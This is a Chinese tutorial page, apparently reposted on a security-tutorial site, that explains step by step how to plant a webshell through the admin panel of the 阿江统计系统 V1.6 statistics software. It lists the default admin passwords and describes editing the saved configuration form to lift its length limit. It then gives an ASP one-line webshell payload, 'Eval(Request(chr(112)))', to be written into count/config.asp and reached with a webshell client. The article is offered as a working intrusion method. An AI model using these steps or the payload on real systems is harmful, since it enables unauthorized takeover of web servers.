• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >入侵防御 > 阿江统计系统V1.6后台拿SHELL的方法

阿江统计系统V1.6后台拿SHELL的方法

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了阿江统计系统V1.6后台拿SHELL的方法,其中包含阿江统计,阿江酷站访问统计系统,品茶阿江新浪博客,阿江品茶,品茶阿江9等知识点,遇到此问题的同学们可以参考下

无奈到了自己这里今天下午又碰到个一样的站 纠结···

不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)

此后台默认的账号密码是 admin admin ,  ITlearner  ITlearner

先进后台

来到修改配置界面 保存源文件到本地

本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100  下边是修改后的截图

然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />

然后保存文件 用IE 打开 在网站访问量地址后写入  0:Eval(Request(chr(112)))

 

这个一句话的密码是P  点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了

只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···

文章作者:冰鱼

</div>

您可能想查找下面的文章:

  • 阿江统计系统V1.6后台拿SHELL的方法

相关文章

  • 请问你是黑客的菜吗?有效防范黑客入侵的绝招
  • 追踪入侵JSP网站服务器
  • 安全中国提取权限过程 图文
  • 手动克隆管理员
  • 入侵网吧多用到的命令与技巧
  • 黑客如何入侵装有SQL数据库的电脑主机
  • SQL注入攻击的种类和防范手段
  • Serv-u6.0提权新招
  • 通过自解压包来实现入侵
  • 入侵RedHat Linux系统实例

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • MSSQL数据库SA权限入侵的感悟
    • DNS(域名服务器)欺骗技术
    • 黑客入侵常用的新型万能登陆密码
    • 记一次曲折的php入侵
    • 80sec网站感恩节被攻击事件分析
    • 网站和数据库分离的入侵技术(图)
    • 突破一流信息监控系统传木马并获得系统权限
    • 一个注射点,一个webshell甚至系统权限
    • 入侵新手法 CMD下加sql账号
    • webshell下分离大文件资料

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有